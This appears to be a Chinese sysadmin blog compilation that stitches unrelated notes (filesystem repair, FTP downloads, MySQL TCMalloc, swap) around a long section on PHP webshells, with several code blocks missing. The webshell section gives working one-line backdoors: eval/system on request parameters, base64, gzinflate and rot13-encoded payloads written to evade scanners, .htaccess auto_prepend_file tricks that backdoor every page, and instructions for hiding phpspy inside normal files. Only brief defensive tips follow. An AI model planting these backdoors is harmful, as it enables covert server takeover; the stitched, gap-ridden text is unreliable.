沧海一粟

1. 重启系统看是否可以自动修复。

2. 使用fsck -y /dev/sda1 进行自动修复。（用”-y”选项来执行该命令对硬盘进行检查和修复）

  添加参数：fsck -y -C -t ext3 /dev/sda1 （一般情况下修复完成后，所有文件移动到 lost+found目录，文件名会被改变）
   （-C 显示进度条 -t 指定文件系统类型 -y 默认自动yes修复）

3. 如果fsck修复完成后，启动系统依然自读。
   查看分区结构：
   [root@localhost ~]# more /etc/fstab
  
   [root@localhost ~]# more /proc/mounts

   [root@localhost ~]# mount
   /dev/sda2 on / type ext3 (rw)
    proc on /proc type proc (rw)
   sysfs on /sys type sysfs (rw)
   查看ro挂载的分区,如果发现有ro，就重新mount
   umount /dev/sda1
   mount /dev/sda1 /boot
   如果发现有提示“device is busy”，找到是什么进程使得他busy
   fuser -m /boot 将会显示使用这个模块的pid
   fuser -mk /boot 将会直接kill那个pid
   然后重新mount即可。

4. 直接remount
   [root@localhost ~]# mount -o rw,remount /dev/sda1

环境：CentOS 5.0 操作系统
一.安装：
1.安装Vsftpd服务相关部件：

目标ftp服务器是一个非标准端口的ftp

1.通过shell登录
#ftp    //shell下输入ftp命令,进入到ftp提示符
>open IP  PORT   //IP ,PORT对应为服务器的IP和端口号
或者直接使用一条语句
#ftp  IP  PORT


2.多文件下载(对目录无效)
如:下载目录下的所有文件(子目录是无法下载下来的)
>mget *
这样操作,下载每个文件都会提问,每次都要输入一个y
要去掉提问,就要先输入
>prompt off


3.解决:ftp命令行不支持目录下载
通过wget得到解决
#wget ftp://IP:PORT/* --ftp-user=xxx --ftp-password=xxx -r
注:
星号*必须有,否则下载下来的就一个文件index.html
-r参数就是用来目录下载的

附:
一个ftp多文件下载上传的shell脚本
ftp server: 192.168.0.100:2121
User/PWD  :  test/ 2009
到OUTBOX下下载所有的文件(不包括文件夹),并将test.txt上传到INBOX
内容如下

根据关键词删除行,过滤筛选


根据关键词提取内容



监控脚本

php后门有很多，包子也见多了和玩多了，但是在一次帮助朋友检查服务器的时候，竟然发现这样的恶意代码。

事情是这样的，朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到，小黑的伎俩很高级，每次使用完毕总是把后门删掉，但是每次都能继续进来，总是找不到从哪进来的。这个着实让人蛋疼。

后来，终于在日志中发现一丝蛛丝马迹，通过我的分析，我发现一个IP总是很奇怪的POST数据到某个文件。然后一段时间后，此IP就访问一个莫名奇妙文件，名字很显眼明显不是正常系统文件，而是PHP后门。但是很快使用完毕后门就被删除了。

    我们以一个学习的心态来对待这些PHP后门程序，很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马



404页面是网站常用的文件，一般建议好后很少有人会去对它进行检查修改，这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话


将$_POST['code']的内容赋值给$_SESSION['theCode']，然后执行$_SESSION['theCode']，亮点是没有特征码。用扫描工具来检查代码的话，是不会报警的，达到目的了。

超级隐蔽的PHP后门




执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用。

层级请求，编码运行PHP后门

此方法用两个文件实现，文件1


文件2


通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果，一般waf对referer这些检测要松一点，或者没有检测。用这个思路bypass
waf不错。

PHP后门生成工具weevely

    weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web
页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。

    weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描，结果显示该文件无任何威胁。

    以上是大概介绍下边是截图，相关使用方法亦家就不在这介绍了，简单的科普一下。


三个变形的一句话PHP木马

第一个：


在菜单里写 1.php?2=assert 密码是1。

第二个：


在菜刀里写2.php?_=assert&__=eval($_POST['pass'])
密码是pass。如果你用菜刀的附加数据的话更隐蔽，或者用其它注射工具也可以，因为是post提交的。

第三个：



str_rot13(‘riny’)即编码后的eval，完全避开了关键字，又不失效果，让人吐血！

如何应对PHP一句话后门

我们强调几个关键点，看这文章的你相信不是门外汉，我也就不啰嗦了：

1，对PHP程序编写要有安全意识。
2，服务器日志文件要经常看，经常备份。
3，对每个站点进行严格的权限分配。
4，对动态文件及目录经常批量安全审查。
5，学会如何进行手工杀毒《即行为判断查杀》。
6，时刻关注，或渗入活跃的网络安全营地。
7，对服务器环境层级化处理，哪怕一个函数也可做规则。

首先建立一PHP文件test.php 文件内容为:
　　
　　Txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了， 然后把在lanker微型PHP后门客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了，执行返回的结果都可以看到。 　　

方法2现在的webshell是越来越流行了，连php的后门也追上来了，主要的有angel的phpspy和 lanker的一句话后门！所以现在最主要的是怎么隐蔽我们的后门，想必看完我的文章大家都有自己各自的想法了。其实lanker的一句话后门确实很强大，但是要用户使用客户端的话会带来一些不必要的麻烦，虽然可以使程序没有记录，（POST没记录的哦）但是对于一般的站点这其实并不是很重要。有没与想过把phpspy插到一个文件里去呢？没有想过吗？呵呵，跟我来，我们用记事本打开phspy就好了，搜索登录入口四个字。 在

现在你可以把这一个phpspy都写到对方的某个正常的php文件里，直接浏览是看不出问题的喔，我们要登录的时候就直接在文件名后面加上?name= wrsky才可以看到 当然你也可以改成别的，只要替代上面 代码里的name和wrsky就可以的，相信自己动手你会觉得收获很大的。如果你要自己改写一些简单的代码而你又不会php的话，这里就有样东西要介绍给你哦~php后门插入器，呵呵，你可以在http://www.wrsky.com 火狐下载到它~~ 我们来看看怎么使用这个 工具 。先看看这个程序的样子。 呵呵~红色的喔，粉PP吧~~我们来测试一下，我在这里提供一段 代码

这段 代码是执行cmd命令的，我们利用插入 工具 进行插入看看！ 没插入前的样子我的设置为参数名为name，参数值为wrsky。插入文件我用了相对路径./ceshi.php 大家可以参考我插入的设置。因为程序和要插入的文件在同目录所以我写了./ceshi.php当然了，你也可以写成 /home/imaboy/bk.php（因为这是 linux 系统） 显示写入文件成功，我们开始连接咱的木马，以为我用的参数的name，值是wrsky，所以连接方式为 木马 所在地址?name=wrsky 大家可以看到，在输入后面的参数后运行完全正常，而且不易被发现喔，很可能被带到另外一台主机上去喔 。 ，
呵呵，只要想一点，你们肯定还会有更好的办法的！

php后门木马常用的函数大致上可分为四种类型：
　　1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
　　2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
　　3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
　　4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
　　1. 执行系统命令:
　　system 函数
　　//test.php?cmd=ls
　　system($_GET[cmd]);
　　passthru 函数
　　//test.php?cmd=ls
　　passthru($_GET[cmd]);
　　shell_exec 函数
　　//test.php?cmd=ls
　　echo shell_exec($_GET[cmd]);
　　exec 函数
　　//test.php?cmd=ls
　　$arr = array();
　　exec($_GET[cmd],$arr);
　　print_r($arr);
　　popen 函数
　　//test.php?cmd=ls
　　$handle = popen('$_GET[cmd], 'r');
　　$read = fread($handle, 2096);
　　echo $read;
　　pclose($handle);
　　proc_open 函数
　　//test.php?cmd=ls
　　$descriptorspec = array(
　　0 => array('pipe', 'r'),
　　1 => array('pipe', 'w'),
　　2 => array('pipe', 'w'),
　　);
　　$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
　　fclose($pipes[0]);
　　$output = array();
　　while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
　　print_r($output);
　　2. 代码执行与加密:
　　eval 函数
　　//最常见的一句话木马
　　eval($_POST[cmd]);
　　base64_decode 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
　　gzinflate 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
　　gzuncompress 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
　　gzdecode 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
　　str_rot13 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST[cmd]);
　　eval(str_rot13('riny($_CBFG[pzq]);'));
　　assert 函数
　　//类似eval函数
　　assert($_POST[cmd]);
　　call_user_func 函数
　　//使用call_user_func调用assert
　　call_user_func('assert',$_POST[cmd]);
　　call_user_func 函数
　　//使用call_user_func调用任意函数
　　//test.php?a=assert&cmd=phpinfo()
　　call_user_func($_GET[a],$_REQUEST[cmd]);
　　组合代码
　　//组合方式调用任意函数
　　//test.php?a=assert&cmd=phpinfo()
　　$_GET[a]($_REQUEST[cmd]);
　　3. 文件包含与生成:
　　require 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　require($_GET[file]);
　　require_once 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　require_once($_GET[file]);
　　include 函数
　　//包含任意文件 www.jb51.net
　　//test.php?file=123.jpg
　　include($_GET[file]);
　　include_once 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　include_once($_GET[file]);
　　file_get_contents 函数
　　//读取任意文件
　　//test.php?f=config.inc.php
　　echo file_get_contents($_GET['f']);
　　file_put_contents 函数
　　//生成任意内容文件
　　//a=test.php&b=
　　file_put_contents($_GET[a],$_GET[b]);
　　fputs 函数
　　//生成任意内容文件
　　//a=test.php&b=
　　fputs(fopen($_GET[a],"w"),$_GET[b]);
　　4. .htaccess:
　　SetHandler
　　//可将php代码存于非php后缀文件,例: x.jpg
　　//将以下代码写入.htaccess中
　　//连接x.jpg即可启动后门木马出处www.admin8.us
　　
　　SetHandler application/x-httpd-php
　　
　　auto_prepend_file
　　//可将php代码存于非php后缀文件,例: 123.gif
　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径
　　//访问网站上任何php文件都会启动该php后门木马
　　//可在不更改站点源代码的情况下记录所有$_REQUEST的值，也可批量挂马
　　php_value auto_prepend_file c:/apache2/htdocs/123.gif
　　auto_append_file
　　//类似auto_prepend_file
　　//可将php代码存于非php后缀文件,例: 123.gif
　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径
　　//访问网站上任何php文件都会启动该php后门木马
　　php_value auto_append_file c:/apache2/htdocs/123.gif
防范方法：通过禁止危险函数 php.ini中设置disable_functions详情可以参考下 http://www.jb51.net/article/19292.htm

TCMalloc（Thread-Caching Malloc）是google开发的开源工具──“google-perftools”中的成员，地址：http://code.google.com/p/gperftools/。与标准的glibc库的malloc相比，TCMalloc在内存的分配上效率和速度要高得多，可以在很大程度上提高MySQL服务器在高并发情况下的性能，降低系统负载。
为MySQL添加TCMalloc库的安装步骤（Linux环境）：
1、64位操作系统请先安装libunwind库，32位操作系统不要安装。libunwind库为基于64位CPU和操作系统的程序提供了基本的堆栈辗转开解功能，其中包括用于输出堆栈跟踪的API、用于以编程方式辗转开解堆栈的API以及支持C++异常处理机制的API。



2、安装google-perftools：



3、修改MySQL启动脚本（根据你的MySQL安装位置而定）：



在# executing mysqld_safe的下一行，加上：


保存后退出，然后重启MySQL服务器。
4、使用lsof命令查看tcmalloc是否起效：


如果发现以下信息，说明tcmalloc已经起效：


如果看不到这些信息，表示perftools没有配置成功，可能是因为你编译mysql时使用了参数with-mysqld-ldflags=-all-static。

　　一、增加2G的swap交换文件
　　1、创建并激活swap交换文件



2、加到fstab文件中让系统引导时自动启动


在末尾增加以下内容：